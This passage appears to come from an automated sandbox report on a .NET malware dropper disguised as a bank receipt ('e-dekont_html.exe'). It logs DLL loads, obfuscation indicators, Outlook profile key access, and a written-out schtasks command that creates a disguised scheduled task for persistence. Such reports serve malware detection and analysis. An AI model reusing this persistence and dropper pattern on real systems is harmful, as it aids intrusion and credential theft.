Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\e-dekont_html.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\e-dekont_html.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\e-dekont_html.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: e-dekont_html.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: e-dekont_html.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: e-dekont_html.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: QrSB.pdb source: e-dekont_html.exe, HvgRSvNGGXnNtV.exe.0.dr
Source:	Binary string: QrSB.pdbSHA256 source: e-dekont_html.exe, HvgRSvNGGXnNtV.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, iREnGfcZgH5xV715w4.cs	.Net Code: NjXpK65iEh System.Reflection.Assembly.Load(byte[])
Source: 0.2.e-dekont_html.exe.37b9f78.2.raw.unpack, MainForm.cs	.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, iREnGfcZgH5xV715w4.cs	.Net Code: NjXpK65iEh System.Reflection.Assembly.Load(byte[])

Source: e-dekont_html.exe

Static PE information: 0xC3848D12 [Mon Dec 11 18:53:06 2073 UTC]

Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08667298 push cs; ret	0_2_08667299
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 10_2_06E59241 push es; ret	10_2_06E59244
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_02744EDC pushfd ; retf	11_2_02744EDD
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_07C42933 push esp; ret	11_2_07C42939
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080A7298 push cs; ret	11_2_080A7299
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 11_2_080AC7C2 pushad ; ret	11_2_080AC7C9
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Code function: 16_2_00EF9C30 push esp; retf 00F1h	16_2_00EF9D55

Source: e-dekont_html.exe	Static PE information: section name: .text entropy: 7.682825162522038
Source: HvgRSvNGGXnNtV.exe.0.dr	Static PE information: section name: .text entropy: 7.682825162522038

Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, AdUcGSJONaPqjv5tqq.cs	High entropy of concatenated method names: 'ihmTaSoEh8', 'eKsTNtspEH', 'XndTb1VVjh', 'gI6TlTvqNd', 'ccXTcsDDgw', 'S1BbY9UhHS', 'ac2b5cujTN', 'JdRbevIOLb', 'AdEbiQf53W', 'BCZbtHmX82'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, HW7pVNyyma3BBJpQrO.cs	High entropy of concatenated method names: 'OJWj6dussY', 'FE8jAkehWC', 's82jJlC7U6', 'cSxjWyeyaB', 'Xbkjhqoiup', 'mcejnnGkaU', 'HB9j1vKtX2', 'af1jFkHPLE', 'qWmj9IGiEc', 'ahxju6YCKj'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, upwqkx2lypDjhHuRA1.cs	High entropy of concatenated method names: 'QUuKcCoQA', 'rN54PSZ28', 'KE6XBlmF2', 'roHsQtvt1', 'Q5JARDlwW', 'VDZPi5D50', 'sduwNlL3L3C7T00PXd', 'IPjb5ejumbevXs2mpy', 'iJvqymgSZljpivrjph', 'rK279cFXN'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, CSBqd76FVHPD4GisL5.cs	High entropy of concatenated method names: 'KNcNGW1kBT', 'g5lNdxYp3Q', 'klVNETWPZb', 'mbJNRd18DL', 'yCTNYrJetZ', 'yu0N5qnfaD', 'VsyNeByBbP', 'QMaNiHmLLE', 'zrwNtdT83w', 'ad0NDIdCZu'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, i1Npms1dG9b4SLocC5.cs	High entropy of concatenated method names: 'i6YlVht249', 'n5GlLVG7KE', 'sV2lT8ssLa', 'aXOTD1r4bD', 'UNjTz62Eth', 'EPvlOgLKpA', 'LxMlIXoxFE', 'Wb5l24cs9f', 'OYylxP4JWO', 'iQFlpskF5Q'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, Wc6Q8lIphJN7WUyck5h.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mkOBMl4nEV', 'vQXB3usTXb', 'Xn9BQvLp65', 'k5tBBoDV8t', 'xDPBmXoKEJ', 'RB2BCyFTw1', 'gAWBrlZbxr'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, G2fvhYIIOeL7tHWoSLl.cs	High entropy of concatenated method names: 'dwx3Di3DHe', 'wlT3zLU6B9', 'TXmQOkKeKu', 'JbHQIXOKLg', 'bBbQ2u3SNs', 'a1KQxiPeqJ', 'PJwQpnY7sN', 'c6yQaPTr0I', 'RyEQV2yOEB', 'nrFQNQwkrN'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, yZy5NwSKgDIZAACgE3.cs	High entropy of concatenated method names: 'xWslUEmU3O', 'fCAlkosj1K', 'puLlKijBk6', 'gEMl4oFqmU', 'EsGlZGAtpd', 'L0UlXvioda', 't6ElshBKES', 'DFBl6VCP9h', 'fprlA69xgB', 'VA0lPAseV3'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, pRCkeAz5OtWm9u5i4q.cs	High entropy of concatenated method names: 'xAA3X5GH6y', 'vsW36Gq3Fm', 'Hld3AYEyro', 'd653JxMOcF', 'foh3WSHaWn', 'pLR3hn44Xo', 'Xtx3nkWxcx', 'uUq3rkpgWM', 'mWV3UZXg4K', 'Eup3klcAWN'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, YyirUV5BHEltBactSH.cs	High entropy of concatenated method names: 'gCBwiUICDj', 'wYKwD9BKL8', 'c8D7OMlKkl', 'xkW7IE97NA', 'TTDwupBgQN', 'le7w0lE7SF', 'c3UwynFMT2', 'OEiwGesa9B', 'WjXwd8wtxx', 'l7YwEP0XN3'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, MedAUjputEsyGF6Pt2.cs	High entropy of concatenated method names: 'q6XIlSBqd7', 'MVHIcPD4Gi', 'U7hIgn2WAh', 'KHAIHba9gg', 'sSHIoiB4dU', 'kGSI8ONaPq', 'kFO32ghrgCraat08u9', 'OUFu9fSYJLrg7ISGen', 'I7xII9ZbTn', 'dIlIxpMPBp'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, Ujlk6mRFBEMALBcm88.cs	High entropy of concatenated method names: 'C8owgd2QKr', 'vjAwH2uxEY', 'ToString', 'k9wwVXVLwt', 'CwCwNFjD8t', 'DHdwLIc3i5', 'JLmwbi5SYi', 'KvDwTcl0tS', 'UE1wliGhqb', 't3TwcmQdP3'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, e9ggWKPr3PnVM3SHiB.cs	High entropy of concatenated method names: 'b96bZrqFyP', 'DJObsI7arW', 'UGXLvnvwLt', 'dTGLhYdnbX', 'KamLnuh7eb', 'tY9Lf6TOyt', 'VI1L1NOJZZ', 'EWJLF3f3U8', 'a4ZLSOvrMU', 'EgwL97aJrv'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, n1sl0teDvd0Pxu4cMf.cs	High entropy of concatenated method names: 'ONfMoGy7U7', 'eAwMw6yHOS', 'H4AMMl9euG', 'mcjMQj3TZS', 'RuiMm62VR8', 'F4EMrY7Khg', 'Dispose', 'yLL7VNfD4L', 'V8n7NVdUUH', 'Ix57LG9RDN'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, nbb8QnNbmnkODG7y8r.cs	High entropy of concatenated method names: 'Dispose', 'R0PItxu4cM', 'tfl2WQQMiT', 'Rw2V43bvFc', 'JwXIDhNVJu', 'DK6IzYV3s3', 'ProcessDialogKey', 'KFQ2OjVyso', 'bAQ2Iu0dvv', 'mLr22Sn6yt'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, tjVysot2AQu0dvvgLr.cs	High entropy of concatenated method names: 'PZCMJH3mCp', 'yVkMW9lYgy', 'i1PMviYlRY', 'n8AMh0WLfW', 'AcBMnLMK4c', 'IeUMfXrdEF', 'T7aM1AVO88', 'SuZMFWsvcw', 'dySMSwlTQg', 'C55M99a6XH'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, OCmNtUG5tcQNK8ZiJ1.cs	High entropy of concatenated method names: 'EUFo9FiQZb', 'vATo0QSAXG', 'hv5oGC75bl', 'Pnood40qhE', 'OaXoWUVYwf', 'xckovfUA41', 'fI2ohgJC9o', 'AxlonaMGmE', 'ocZofEudee', 'ORco1B0Nv3'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, FoopVYA7hn2WAhfHAb.cs	High entropy of concatenated method names: 'hA5L4AoLoV', 'AgLLX2Yltt', 'UcEL6gynYa', 'OkHLAiiSkg', 'eHNLoi2yEw', 'HPCL8nPk0q', 'fQ0Lwum5Fh', 'NR4L7v1SZQ', 'SgZLMLXkLk', 'IsEL3n0v6B'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, Mn6yt0DkxrQKJDFWUY.cs	High entropy of concatenated method names: 'Yf93Lygxmv', 'sU73bsVAn3', 'WkP3TbCjPe', 'JUj3lvDfns', 'CaT3MQcYfm', 'nkZ3c63hIC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, iREnGfcZgH5xV715w4.cs	High entropy of concatenated method names: 'iBQxaqjlfC', 'Sl5xV02clK', 'nRqxNQ7HqI', 'IhExLlPEY7', 'hJixbG7I7K', 'clCxT0311H', 'SRKxlgDjlQ', 'iOKxckB1Yl', 'fiUxqBXFuy', 'FXPxgYQUeI'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, AdUcGSJONaPqjv5tqq.cs	High entropy of concatenated method names: 'ihmTaSoEh8', 'eKsTNtspEH', 'XndTb1VVjh', 'gI6TlTvqNd', 'ccXTcsDDgw', 'S1BbY9UhHS', 'ac2b5cujTN', 'JdRbevIOLb', 'AdEbiQf53W', 'BCZbtHmX82'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, HW7pVNyyma3BBJpQrO.cs	High entropy of concatenated method names: 'OJWj6dussY', 'FE8jAkehWC', 's82jJlC7U6', 'cSxjWyeyaB', 'Xbkjhqoiup', 'mcejnnGkaU', 'HB9j1vKtX2', 'af1jFkHPLE', 'qWmj9IGiEc', 'ahxju6YCKj'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, upwqkx2lypDjhHuRA1.cs	High entropy of concatenated method names: 'QUuKcCoQA', 'rN54PSZ28', 'KE6XBlmF2', 'roHsQtvt1', 'Q5JARDlwW', 'VDZPi5D50', 'sduwNlL3L3C7T00PXd', 'IPjb5ejumbevXs2mpy', 'iJvqymgSZljpivrjph', 'rK279cFXN'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, CSBqd76FVHPD4GisL5.cs	High entropy of concatenated method names: 'KNcNGW1kBT', 'g5lNdxYp3Q', 'klVNETWPZb', 'mbJNRd18DL', 'yCTNYrJetZ', 'yu0N5qnfaD', 'VsyNeByBbP', 'QMaNiHmLLE', 'zrwNtdT83w', 'ad0NDIdCZu'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, i1Npms1dG9b4SLocC5.cs	High entropy of concatenated method names: 'i6YlVht249', 'n5GlLVG7KE', 'sV2lT8ssLa', 'aXOTD1r4bD', 'UNjTz62Eth', 'EPvlOgLKpA', 'LxMlIXoxFE', 'Wb5l24cs9f', 'OYylxP4JWO', 'iQFlpskF5Q'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, Wc6Q8lIphJN7WUyck5h.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mkOBMl4nEV', 'vQXB3usTXb', 'Xn9BQvLp65', 'k5tBBoDV8t', 'xDPBmXoKEJ', 'RB2BCyFTw1', 'gAWBrlZbxr'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, G2fvhYIIOeL7tHWoSLl.cs	High entropy of concatenated method names: 'dwx3Di3DHe', 'wlT3zLU6B9', 'TXmQOkKeKu', 'JbHQIXOKLg', 'bBbQ2u3SNs', 'a1KQxiPeqJ', 'PJwQpnY7sN', 'c6yQaPTr0I', 'RyEQV2yOEB', 'nrFQNQwkrN'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, yZy5NwSKgDIZAACgE3.cs	High entropy of concatenated method names: 'xWslUEmU3O', 'fCAlkosj1K', 'puLlKijBk6', 'gEMl4oFqmU', 'EsGlZGAtpd', 'L0UlXvioda', 't6ElshBKES', 'DFBl6VCP9h', 'fprlA69xgB', 'VA0lPAseV3'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, pRCkeAz5OtWm9u5i4q.cs	High entropy of concatenated method names: 'xAA3X5GH6y', 'vsW36Gq3Fm', 'Hld3AYEyro', 'd653JxMOcF', 'foh3WSHaWn', 'pLR3hn44Xo', 'Xtx3nkWxcx', 'uUq3rkpgWM', 'mWV3UZXg4K', 'Eup3klcAWN'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, YyirUV5BHEltBactSH.cs	High entropy of concatenated method names: 'gCBwiUICDj', 'wYKwD9BKL8', 'c8D7OMlKkl', 'xkW7IE97NA', 'TTDwupBgQN', 'le7w0lE7SF', 'c3UwynFMT2', 'OEiwGesa9B', 'WjXwd8wtxx', 'l7YwEP0XN3'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, MedAUjputEsyGF6Pt2.cs	High entropy of concatenated method names: 'q6XIlSBqd7', 'MVHIcPD4Gi', 'U7hIgn2WAh', 'KHAIHba9gg', 'sSHIoiB4dU', 'kGSI8ONaPq', 'kFO32ghrgCraat08u9', 'OUFu9fSYJLrg7ISGen', 'I7xII9ZbTn', 'dIlIxpMPBp'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, Ujlk6mRFBEMALBcm88.cs	High entropy of concatenated method names: 'C8owgd2QKr', 'vjAwH2uxEY', 'ToString', 'k9wwVXVLwt', 'CwCwNFjD8t', 'DHdwLIc3i5', 'JLmwbi5SYi', 'KvDwTcl0tS', 'UE1wliGhqb', 't3TwcmQdP3'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, e9ggWKPr3PnVM3SHiB.cs	High entropy of concatenated method names: 'b96bZrqFyP', 'DJObsI7arW', 'UGXLvnvwLt', 'dTGLhYdnbX', 'KamLnuh7eb', 'tY9Lf6TOyt', 'VI1L1NOJZZ', 'EWJLF3f3U8', 'a4ZLSOvrMU', 'EgwL97aJrv'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, n1sl0teDvd0Pxu4cMf.cs	High entropy of concatenated method names: 'ONfMoGy7U7', 'eAwMw6yHOS', 'H4AMMl9euG', 'mcjMQj3TZS', 'RuiMm62VR8', 'F4EMrY7Khg', 'Dispose', 'yLL7VNfD4L', 'V8n7NVdUUH', 'Ix57LG9RDN'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, nbb8QnNbmnkODG7y8r.cs	High entropy of concatenated method names: 'Dispose', 'R0PItxu4cM', 'tfl2WQQMiT', 'Rw2V43bvFc', 'JwXIDhNVJu', 'DK6IzYV3s3', 'ProcessDialogKey', 'KFQ2OjVyso', 'bAQ2Iu0dvv', 'mLr22Sn6yt'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, tjVysot2AQu0dvvgLr.cs	High entropy of concatenated method names: 'PZCMJH3mCp', 'yVkMW9lYgy', 'i1PMviYlRY', 'n8AMh0WLfW', 'AcBMnLMK4c', 'IeUMfXrdEF', 'T7aM1AVO88', 'SuZMFWsvcw', 'dySMSwlTQg', 'C55M99a6XH'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, OCmNtUG5tcQNK8ZiJ1.cs	High entropy of concatenated method names: 'EUFo9FiQZb', 'vATo0QSAXG', 'hv5oGC75bl', 'Pnood40qhE', 'OaXoWUVYwf', 'xckovfUA41', 'fI2ohgJC9o', 'AxlonaMGmE', 'ocZofEudee', 'ORco1B0Nv3'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, FoopVYA7hn2WAhfHAb.cs	High entropy of concatenated method names: 'hA5L4AoLoV', 'AgLLX2Yltt', 'UcEL6gynYa', 'OkHLAiiSkg', 'eHNLoi2yEw', 'HPCL8nPk0q', 'fQ0Lwum5Fh', 'NR4L7v1SZQ', 'SgZLMLXkLk', 'IsEL3n0v6B'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, Mn6yt0DkxrQKJDFWUY.cs	High entropy of concatenated method names: 'Yf93Lygxmv', 'sU73bsVAn3', 'WkP3TbCjPe', 'JUj3lvDfns', 'CaT3MQcYfm', 'nkZ3c63hIC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, iREnGfcZgH5xV715w4.cs	High entropy of concatenated method names: 'iBQxaqjlfC', 'Sl5xV02clK', 'nRqxNQ7HqI', 'IhExLlPEY7', 'hJixbG7I7K', 'clCxT0311H', 'SRKxlgDjlQ', 'iOKxckB1Yl', 'fiUxqBXFuy', 'FXPxgYQUeI'

Source: C:\Users\user\Desktop\e-dekont_html.exe

File created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\e-dekont_html.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
